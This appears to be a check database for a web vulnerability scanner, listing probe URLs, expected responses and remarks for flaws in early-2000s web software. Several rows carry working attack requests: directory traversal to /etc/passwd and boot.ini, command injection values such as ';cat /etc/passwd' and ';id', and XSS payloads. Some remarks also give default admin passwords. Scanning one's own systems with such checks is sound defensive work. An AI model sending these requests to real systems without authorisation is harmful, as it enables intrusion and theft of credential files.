c,generic,/,Admin_files/,200,GET,"This might be interesting..."
c,generic,/,advwebadmin/,200,GET,"This might be interesting...probably HostingController, www.hostingcontroller.com"
c,generic,/,akopia/,200,GET,"Akopia is installed."
c,generic,/,analog/,200,GET,"This might be interesting..."
c,generic,/,ans.pl?p=../../../../../usr/bin/id|&blah,"uid",GET,"Avenger's News System allows commands to be issued remotely.  http://ans.gq.nu/ default admin string 'admin:aaLR8vE.jjhss:root@127.0.0.1', password file location 'ans_data/ans.passwd'"
c,generic,/,app/,200,GET,"This might be interesting..."
c,generic,/,apps/,200,GET,"This might be interesting..."
c,generic,/,archive/,200,GET,"This might be interesting..."
c,generic,/,article.php?article=4965&post=1111111111,"Unable to jump to row",GET,"PHP FirstPost can reveal MySQL errors and file system paths if invalid posts are sent."
c,generic,/,asp/,200,GET,"This might be interesting..."
c,generic,/,atc/,200,GET,"This might be interesting..."
c,generic,/,author.asp,200,GET,"May be FactoSystem CMS, which could include SQL injection problems which could not be tested remotely."
c,generic,/,awebvisit.stat,200,GET,"Just found this log file..."
c,generic,/,backup/,200,GET,"This might be interesting..."
c,generic,/,bak/,200,GET,"This might be interesting..."
c,generic,/,ban.bak,200,GET,"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected."
c,generic,/,ban.dat,200,GET,"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected."
c,generic,/,ban.log,200,GET,"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected."
c,generic,/,banmat.pwd,200,GET,"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected."
c,generic,/,basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu,"root:",GET,"Remote file retrieval."
c,generic,/,bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK,"root:",GET,"The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320."
c,generic,/,bc4j.html,"Business Components",GET,"Default Oracle page, may allow limited administration."
c,generic,/,beta/,200,GET,"This might be interesting..."
c,generic,/,bigconf.cgi,200,GET,"BigIP Configuration CGI"
c,generic,/,bin/,200,GET,"This might be interesting..."
c,generic,/,blah-whatever-badfile.jsp,"Script /",GET,"The web server is configured to respond with the web server path when requesting a non-existent .jsp file."
c,generic,/,blah123.php,"Failed opening ",GET,"PHP is configured to give descriptive error messages which can reveal file system paths."
c,generic,/,blah_badfile.shtml,200,GET,"Allaire Coldfusion allows jsp source viewed through a vulnerable SSI call.","<!--#include virtual=\"/index.jsp\"-->"
c,generic,/,buy/,200,GET,"This might be interesting..."
c,generic,/,buynow/,200,GET,"This might be interesting..."
c,generic,/,c/,200,GET,"This might be interesting..."
c,generic,/,c32web.exe/ChangeAdminPassword,200,GET,"This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password."
c,generic,/,ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini,"[fonts]",GET,"It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name. CAN-2000-1076"
c,generic,/,ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd,"root:",GET,"It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name. CAN-2000-1076"
c,generic,/,ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini,"[windows]",GET,"It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name. CAN-2000-1076"
c,generic,/,cache-stats/,200,GET,"This might be interesting..."
c,generic,/,cart/,200,GET,"This might be interesting..."
c,generic,/,categorie.php3?cid=june,"Unable to jump to row",GET,"Black Tie Project (BTP) can reveal MySQL errors and file system paths if an invalid cid is sent."
c,generic,/,catinfo,200,GET,"May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test."
c,generic,/,ccard/,200,GET,"This might be interesting..."
c,generic,/,cfcache.map,"Mapping",GET,"May leak directy listing, may also leave server open to a DOS. http://www.securiteam.com/windowsntfocus/ColdFusion_Information_Exposure__CFCACHE_Tag_.html"
c,generic,/,cfide/Administrator/startstop.html,200,GET,"can start/stop the server"
c,generic,/,class/mysql.class,"This program is free software",GET,"Basilix allows its configuration files to be downloaded, which  may include the mysql auth credentials."
c,generic,/,code/,"Index of ",GET,"This might be interesting..."
c,generic,/,com,"index of",GET,"Java class files may be browsable."
c,generic,/,COM,"index of",GET,"Java class files may be browsable."
c,generic,/,config/,"Index of ",GET,"This might be interesting..."
c,generic,/,Config1.htm,200,GET,"This may be a D-Link, some devices have a DoS condition if an oversized POST request is sent. This DoS was not tested. See http://www.phenoelit.de/stuff/dp-300.txt for info."
c,generic,/,contents.php?new_language=elvish&mode=select,200,GET,"Requesting a file with an invalid language selection from DC Portal may reveal the system path."
c,generic,/,counter/,"Index of ",GET,"This might be interesting..."
c,generic,/,cpanel/,200,GET,"Web-based control panel"
c,generic,/,cplogfile.log,200,GET,"XMB Magic Lantern forum 1.6b final (http://www.xmbforum.com) log file is readable remotely. Upgrade to the latest version."
c,generic,/,credit/,"Index of ",GET,"This might be interesting..."
c,generic,/,custdata/,200,GET,"This may be COWS (CGI Online Worldweb Shopping), and may be interesting..."
c,generic,/,customers/,"Index of ",GET,"This might be interesting..."
c,generic,/,dan_o.dat,200,GET,"Just found this log file..."
c,generic,/,dat/,200,GET,"This might be interesting..."
c,generic,/,data/,200,GET,"This might be interesting..."
c,generic,/,database/,200,GET,"Databases? Really??"
c,generic,/,databases/,200,GET,"Databases? Really??"
c,generic,/,db/,200,GET,"This might be interesting..."
c,generic,/,dbase/,200,GET,"This might be interesting..."
c,generic,/,dev/,200,GET,"This might be interesting..."
c,generic,/,devel/,200,GET,"This might be interesting..."
c,generic,/,development/,200,GET,"This might be interesting..."
c,generic,/,directory.php?dir=%3Bcat%20/etc/passwd,"root:",GET,"Marcus S. Xenakis directory.php script allows for command execution. CAN-2002-0434."
c,generic,/,DMR/,200,GET,"This might be interesting..."
c,generic,/,dms0,"DMSDUMP version",GET,"Default Oracle 9iAS allows access to Dynamic Monitoring Services"
c,generic,/,doc-html/,200,GET,"This might be interesting..."
c,generic,/,dostuff.php?action=modify_user,200,GET,"Blahz-DNS allows unauthorized users to edit user information. Upgrade to version 0.25 or higher. http://blahzdns.sourceforge.net/"
c,generic,/,down/,200,GET,"This might be interesting..."
c,generic,/,download.php?op=viewdownload,"Failed opening",GET,"PHPNuke allows file system paths to be revealed."
c,generic,/,download.php?op=viewdownload,"Fatal error",GET,"PHPNuke allows file system paths to be revealed."
c,generic,/,download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"This version of PHP-Nuke's download.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02."
c,generic,/,download/,200,GET,"This might be interesting..."
c,generic,/,downloads/,200,GET,"This might be interesting..."
c,generic,/,easylog/easylog.html,200,GET,"Just found this file..."
c,generic,/,employees/,200,GET,"This might be interesting..."
c,generic,/,examples/jsp/snp/anything.snp,200,GET,"Tomcat servlet gives lots of host information." 
c,generic,/,exe/,200,GET,"This might be interesting..."
c,generic,/,ext.ini.% 00.txt,200,GET,"BadBlue allows access restrictions to be bypassed by using a null byte."
c,generic,/,file-that-is-not-real-2002.php3,"Unable to open",GET,"PHP is configured to show the web root when sending error messages. Set display_errors to 'off'."
c,generic,/,file/,200,GET,"This might be interesting..."
c,generic,/,files/,200,GET,"This might be interesting..."
c,generic,/,forum/,200,GET,"This might be interesting..."
c,generic,/,fpadmin/,200,GET,"This might be interesting..."
c,generic,/,friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"This version of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02."
c,generic,/,ftp/,200,GET,"This might be interesting..."
c,generic,/,getaccess,200,GET,"This may be an indication that the server is running getAccess for SSO"
c,generic,/,global.inc,200,GET,"PHP-Survey's include file should not be available via the web. Configure the web server to ignore .inc files or change this to global.inc.php"
c,generic,/,globals.jsa,200,GET,"Oracle globals.jsa file"
c,generic,/,guestbook/,200,GET,"This might be interesting..."
c,generic,/,guests/,200,GET,"This might be interesting..."
c,generic,/,GWWEB.EXE?HELP=bad-request,"Could not find file SYS",GET,"Groupwise allows system information and file retrieval by modifying arguments to the help system. CAN-2002-0341."
c,generic,/,help/,200,GET,"Help directory should not be accessible"
c,generic,/,hidden/,200,GET,"This might be interesting..."
c,generic,/,hitmatic/,200,GET,"This might be interesting..."
c,generic,/,hitmatic/analyse.cgi,200,GET,"Just found this cgi..."
c,generic,/,hits.txt,200,GET,"Just found this log file..."
c,generic,/,hit_tracker/,200,GET,"This might be interesting..."
c,generic,/,home.php?arsc_language=elvish,"Failed opening '",GET,"ARSC Really Simple Chat can reveal file system paths if an invalid language name is specified."
c,generic,/,home/,200,GET,"This might be interesting..."
c,generic,/,hostingcontroller/,200,GET,"This might be interesting...probably HostingController, www.hostingcontroller.com"
c,generic,/,htdocs/,200,GET,"This might be interesting..."
c,generic,/,html/,200,GET,"This might be interesting..."
c,generic,/,HyperStat/stat_what.log,200,GET,"Just found this file..."
c,generic,/,hyperstat/stat_what.log,200,GET,"Just found this log..."
c,generic,/,ibill/,200,GET,"This might be interesting..."
c,generic,/,idea/,200,GET,"This might be interesting..."
c,generic,/,ideas/,200,GET,"This might be interesting..."
c,generic,/,image/,"Index of ",GET,"index of image directory available"
c,generic,/,images/,"Index of ",GET,"index of image directory available"
c,generic,/,img-sys/,200,GET,"Default image directory should not allow directory listing."
c,generic,/,import/,200,GET,"This might be interesting..."
c,generic,/,inc/sendmail.inc,"This program is free software",GET,"Basilix allows its configuration files to be downloaded, which  may include the mysql auth credentials."
c,generic,/,includes/,200,GET,"This might be interesting..."
c,generic,/,incoming/,200,GET,"This might be interesting..."
c,generic,/,index.jsp%00x,"<%=",GET,"Bea WebLogic 6.1 SP 2 discloses souce by appending %00x to a jsp request. Upgrade to a version newer than 6.2 SP 2 for Win2k."
c,generic,/,index.php/123,"Premature end of script headers",GET,"Some versions of PHP reveal PHP's physical path on the server by appending /123 to the php file name."
c,generic,/,index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script >,"<script>alert('Vulnerable')</script>",GET,"MiniBB http://www.minibb.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,index.php?action=storenew&username=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02."
c,generic,/,index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;,"<script>alert('Vulnerable')</script>",GET,"PostNuke is vulnerable to cross site scripting (XSS). CA-2000-02."
c,generic,/,index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc,"resolv.conf",GET,"phpMyExplorer Allows attackers to read directories on the server."
c,generic,/,index.php?file=index.php,"Fatal error:",GET,"PHPNuke 5.4 allows file system paths to be shown in error messages."
c,generic,/,index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd,"root:",GET,"Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem."
c,generic,/,index.php?page=../../../../../../../../../../boot.ini,"boot loader",GET,"The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)"
c,generic,/,index.php?page=../../../../../../../../../../etc/passwd,"root:",GET,"The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)"
c,generic,/,index.php?sql_debug=1,"SQL query: ",GET,"The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string."
c,generic,/,index.php?|=../../../../../../../../../etc/passwd,"root:",GET,"Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem."
c,generic,/,info/,200,GET,"This might be interesting..."
c,generic,/,install/,200,GET,"This might be interesting..."
c,generic,/,interchange/,200,GET,"Interchange chat is installed. Look for a high-numbered port like 20xx to find it running."
c,generic,/,intranet/,200,GET,"This might be interesting..."
c,generic,/,ip.txt,200,GET,"This may be User Online from http://www.elpar.net version 2.0, which has a remotely accessible log file."
c,generic,/,java-sys/,200,GET,"Default Java directory should not allow directory listing."
c,generic,/,java/,200,GET,"This might be interesting..."
c,generic,/,javadoc/,200,GET,"Documentation...?"
c,generic,/,javax,"index of",GET,"Java class files may be browsable."
c,generic,/,jdbc/,200,GET,"This might be interesting..."
c,generic,/,jigsaw/,200,GET,"Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS), update to latest at http://freshmeat.net/users/yveslafon/. CA-2000-02."
c,generic,/,Jigsaw/,200,GET,"Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS), update to latest at http://freshmeat.net/users/yveslafon/. CA-2000-02."
c,generic,/,launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02."
c,generic,/,launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02."
c,generic,/,lib/,200,GET,"This might be interesting..."
c,generic,/,library/,200,GET,"This might be interesting..."
c,generic,/,log.htm,200,GET,"Just found this log file..."
c,generic,/,log.html,200,GET,"Just found this log file..."
c,generic,/,log.txt,200,GET,"Just found this log file..."
c,generic,/,log/,200,GET,"Ahh...log information...fun!"
c,generic,/,logfile,200,GET,"Just found this log file..."
c,generic,/,logfile.htm,200,GET,"Just found this log file..."
c,generic,/,logfile.html,200,GET,"Just found this log file..."
c,generic,/,logfile.txt,200,GET,"Just found this log file..."
c,generic,/,logfile/,200,GET,"This might be interesting..."
c,generic,/,logfiles/,200,GET,"This might be interesting..."
c,generic,/,logger.html,200,GET,"Just found this log file..."
c,generic,/,logger/,200,GET,"This might be interesting..."
c,generic,/,logging/,200,GET,"This might be interesting..."
c,generic,/,login/,200,GET,"This might be interesting..."
c,generic,/,logs.txt,200,GET,"Just found this log file..."
c,generic,/,lpt9.xtp,"java.io.FileNotFoundException:",GET,"Resin 2.1 reveals the server path when a a DOS device is requested."
c,generic,/,manual.php,200,GET,"Does not filter input before passing to shell command. Try 'ls -l' as the man page entry."
c,generic,/,manual/,200,GET,"Web server manual? tsk tsk."
c,generic,/,midicart.mdb,200,GET,"MIDICART database is available for browsing. This should not be allowed via the web server."
c,generic,/,mlog.phtml,200,GET,"Remote file read vulnerability CVE-1999-0346"
c,generic,/,modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?name=Downloads&d_op=viewdownload,"Failed opening",GET,"PHPNuke allows file system paths to be revealed."
c,generic,/,modules.php?name=Downloads&d_op=viewdownload,"Fatal error",GET,"PHPNuke allows file system paths to be revealed."
c,generic,/,modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?name=Members_List&sql_debug=1,200,GET,"The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string."
c,generic,/,modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid,"uid=",GET,"PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version."
c,generic,/,modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test,<script>alert('Vulnerable')</script>,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?op=modload&name=0&file=0,"Failed opening ",GET,"PHP Nuke is configured to give descriptive error messages which can reveal file system paths."
c,generic,/,modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"The DMOZGateway (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"This install of PHPNuke's modules.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink,"Failed opening ",GET,"PHP Nuke is configured to give descriptive error messages which can reveal file system paths."
c,generic,/,modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Wiki PostNuke Module is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2,<script>alert('Vulnerable')</script>,GET,"The XForum (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"The XForum (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd,"root:",GET,"Gallery Addon for PhpNuke allows files to be read remotely. CAN-2001-0900."
c,generic,/,mod_ose_docs,"Oracle Servlet Engine",GET,"Default Oracle documentation found."
c,generic,/,mp3/,200,GET,"Uh oh..."
c,generic,/,myhome.php?action=messages&box=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"OpenBB 1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,mylog.phtml?screen=/etc/passwd,"root:",GET,"Remote file read vulnerability CVE-1999-0346"
c,generic,/,ncl_items.html,200,GET,"This may allow attackers to reconfigure your Tektronix printer."
c,generic,/,ncl_items.shtml?SUBJECT=1,200,GET,"This may allow attackers to reconfigure your Tektronix printer."
c,generic,/,netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd,"root:",GET,"Sybex E-Trainer allows arbitrary files to be retrieved."
c,generic,/,netget?sid=user&msg=300&file=../../../../../../../../../boot.ini,"boot loader",GET,"Sybex E-Trainer allows arbitrary files to be retrieved."
c,generic,/,new/,200,GET,"This might be interesting..."
c,generic,/,newuser?Image=../../database/rbsserv.mdb,"SystemErrorsPerHour",GET,"The Extent RBS ISP 2.5 allows attackers to read arbitrary files on the server."
c,generic,/,opendir.php?/etc/passwd,"root:",GET,"This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321"
c,generic,/,opendir.php?requesturl=/etc/passwd,"root:",GET,"This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321"
c,generic,/,oprocmgr-status,"Module Name",GET,"Oracle 9iAS default install allows access to the Java Process Manager."
c,generic,/,oracle/,200,GET,"This might be interesting..."
c,generic,/,order/,200,GET,"This might be interesting..."
c,generic,/,orders/,200,GET,"This might be interesting..."
c,generic,/,outgoing/,200,GET,"This might be interesting..."
c,generic,/,page.cgi?../../../../../../../../../../etc/passwd,"root:",GET,"WWWeBBB Forum up to version 3.82beta allow arbitrary file retrieval."
c,generic,/,pages/,200,GET,"This might be interesting..."
c,generic,/,passwd,200,GET,"This could be interesting..."
c,generic,/,passwd.adjunct,200,GET,"This could be interesting..."
c,generic,/,passwd.txt,200,GET,"This could be interesting..."
c,generic,/,password,200,GET,"This could be interesting..."
c,generic,/,passwords.txt,200,GET,"This could be interesting..."
c,generic,/,passwords/,200,GET,"This might be interesting..."
c,generic,/,PDG_Cart/,200,GET,"This might be interesting..."
c,generic,/,perl/,"Index of ",GET,"This should probably not be browsable."
c,generic,/,perl5/,200,GET,"This might be interesting..."
c,generic,/,php.ini,200,GET,"This file should not be available through the web interface."
c,generic,/,php/,200,GET,"This might be interesting..."
c,generic,/,phpimageview.php?pic=javascript:alert('Vulnerable'),"alert('Vulnerable')",GET,"PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS).  CA-2000-02." 
c,generic,/,phpinfo.php,200,GET,"Contains PHP configuration information"
c,generic,/,phpinfo.php3,200,GET,"Contains PHP configuration information"
c,generic,/,phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid,"uid=",GET,"PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version."
c,generic,/,phptonuke.php?filnavn=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"PHPNuke add-on PHPToNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,piranha/secure/passwd.php3,200,GET,"This might be interesting..."
c,generic,/,pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit,"<script>alert('Vulnerable')</script>",GET,"IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello,"<script>alert('Vulnerable')</script>",GET,"WoltLab Burning Board is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,porn/,200,GET,"Uh oh..."
c,generic,/,pr0n/,200,GET,"Uh oh..."
c,generic,/,private/,200,GET,"This might be interesting..."
c,generic,/,pron/,200,GET,"Uh oh..."
c,generic,/,pub/,200,GET,"This might be interesting..."
c,generic,/,public/,200,GET,"This might be interesting..."
c,generic,/,purchase/,200,GET,"This might be interesting..."
c,generic,/,purchases/,200,GET,"This might be interesting..."
c,generic,/,pw/,200,GET,"This might be interesting..."
c,generic,/,quikstore.cfg,200,GET,"Shopping cart config file, http://www.quikstore.com/, http://www.mindsec.com/advisories/post2.txt"
c,generic,/,quikstore.cgi,200,GET,"Shopping cart. It may be interesting..."
c,generic,/,register/,200,GET,"This might be interesting..."
c,generic,/,registered/,200,GET,"This might be interesting..."
c,generic,/,replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"This version of PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSs). CA-2000-02."
c,generic,/,reports/,200,GET,"This might be interesting..."
c,generic,/,reseller/,200,GET,"This might be interesting..."
c,generic,/,restricted/,200,GET,"This might be interesting..."
c,generic,/,retail/,200,GET,"This might be interesting..."
c,generic,/,reviews/newpro.cgi,200,GET,"This might be interesting..."
c,generic,/,root/,"Index of ",GET,"This might be interesting..."
c,generic,/,rtm.log,"HttpPost Retry",GET,"Rich Media's JustAddCommerce allows retrieval of a log file, which may contain sensitive information."
c,generic,/,sales/,200,GET,"This might be interesting..."
c,generic,/,script>alert('Vulnerable')</script>.cfm,"<script>alert('Vulnerable')</script>",GET,"Macromedia's ColdFusion MX server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Patch or upgrade to a newer version, or change the default 404 document. http://www.macromedia.com/v1/handlers/index.cfm?ID=23047"
c,generic,/,scripts,"Index of ",GET,"Remote scripts directory is browsable."
c,generic,/,scripts/weblog,200,GET,"This might be interesting..."
c,generic,/,search.vts,200,GET,"This might be interesting..."
c,generic,/,search/,"Sample Search Interface",GET,"Default iPlanet search is enabled."
c,generic,/,search97.vts,200,GET,"This might be interesting..."
c,generic,/,secret/,200,GET,"This might be interesting..."
c,generic,/,secure/,"Index of ",GET,"This might be interesting..."
c,generic,/,securecontrolpanel/,200,GET,"Web Server Control Panel"
c,generic,/,secured/,"Index of ",GET,"This might be interesting..."
c,generic,/,sell/,200,GET,"This might be interesting..."
c,generic,/,server_stats/,"Index of ",GET,"This might be interesting..."
c,generic,/,SetSecurity.shm,200,GET,"Cisco System's My Access for Wireless... This resource should be password protected."
c,generic,/,setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P,"<script>alert('Vulnerable')</script>",GET,"CiscoSecure ACS v3.0(1) Build 40 allows Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,setup/,200,GET,"This might be interesting..."
c,generic,/,sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Ecometry's SGDynamo is vulnerable to Cross Site Scripting (XSS). ÊCAN-2002-0375. CA-2000-02."
c,generic,/,shop/,200,GET,"This might be interesting..."
c,generic,/,shopadmin.asp,200,GET,"VP-ASP shopping cart admin mayy be available via the web. Default ID/PW are vpasp/vpasp and admin/admin."
c,generic,/,shopa_sessionlist.asp,200,GET,"VP-ASP shopping cart test application is available from the web. This page may give the location of .mdb files which may also be available."
c,generic,/,shopdbtest.asp,"xDatabase",GET,"VP-ASP shopping cart test application is available from the web. This page gives the location of .mdb files which may also be available (xDatabase)."
c,generic,/,shopper/,200,GET,"This might be interesting..."
c,generic,/,shopping300.mdb,200,GET,"VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available."
c,generic,/,shopping400.mdb,200,GET,"VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available."
c,generic,/,SilverStream,"/Pages",GET,"SilverStream allows directory listing"
c,generic,/,site/iissamples/,200,GET,"This might be interesting..."
c,generic,/,siteminder,200,GET,"This may be an indication that the server is running Siteminder for SSO"
c,generic,/,SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator,"Event Log",GET,"SiteScope service has no password set. Restrict by IP and set a password."
c,generic,/,smssend.php,200,GET,"PhpSmssend may allow system calls if a ' is passed to it. http://zekiller.skytech.org/smssend.php"
c,generic,/,software/,"Index of ",GET,"This might be interesting..."
c,generic,/,source/,"Index of ",GET,"This might be interesting..."
c,generic,/,splashAdmin.php,200,GET,"Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely." 
c,generic,/,sql/,"Index of ",GET,"This might be interesting..."
c,generic,/,src/,"Index of ",GET,"This might be interesting..."
c,generic,/,srchadm,200,GET,"This might be interesting..."
c,generic,/,ss.cfg,200,GET,"This might be interesting..."
c,generic,/,ssi/,"Index of ",GET,"This might be interesting..."
c,generic,/,staff/,200,GET,"This might be interesting..."
c,generic,/,stat.htm,200,GET,"Just found this log file..."
c,generic,/,stat/,200,GET,"This might be interesting..."
c,generic,/,statistic/,200,GET,"This might be interesting..."
c,generic,/,statistics/,200,GET,"This might be interesting..."
c,generic,/,stats.htm,200,GET,"Just found this log file..."
c,generic,/,stats.html,200,GET,"Just found this log file..."
c,generic,/,stats.txt,200,GET,"Just found this log file..."
c,generic,/,Stats/,200,GET,"This might be interesting..."
c,generic,/,stats/,200,GET,"This might be interesting..."
c,generic,/,status/,200,GET,"This might be interesting..."
c,generic,/,store/,200,GET,"This might be interesting..."
c,generic,/,StoreDB/,200,GET,"This might be interesting..."
c,generic,/,style/,"Index of ",GET,"May be able to view web styles directory."
c,generic,/,styles/,"Index of ",GET,"May be able to view web styles directory."
c,generic,/,submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview","<script>alert('Vulnerable')</script>",GET,"This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,super_stats/access_logs,200,GET,"This might be interesting..."
c,generic,/,support/,200,GET,"This might be interesting..."
c,generic,/,sys/,200,GET,"This might be interesting..."
c,generic,/,system/,200,GET,"This might be interesting..."
c,generic,/,temp/,200,GET,"This might be interesting..."
c,generic,/,template/,200,GET,"This may be interesting as the directory may hold sensitive files or reveal system information."
c,generic,/,test/,200,GET,"This might be interesting..."
c,generic,/,testing/,200,GET,"This might be interesting..."
c,generic,/,ticket.php?id=99999,"expects first argument",GET,"ZenTrack from http://zentrack.phpzen.net/ versions v2.0.3, v2.0.2beta and older reveal the web root with certain errors."
c,generic,/,tmp/,200,GET,"This might be interesting..."
c,generic,/,tools/,200,GET,"This might be interesting..."
c,generic,/,trafficlog/,200,GET,"This might be interesting..."
c,generic,/,tree/,200,GET,"This might be interesting..."
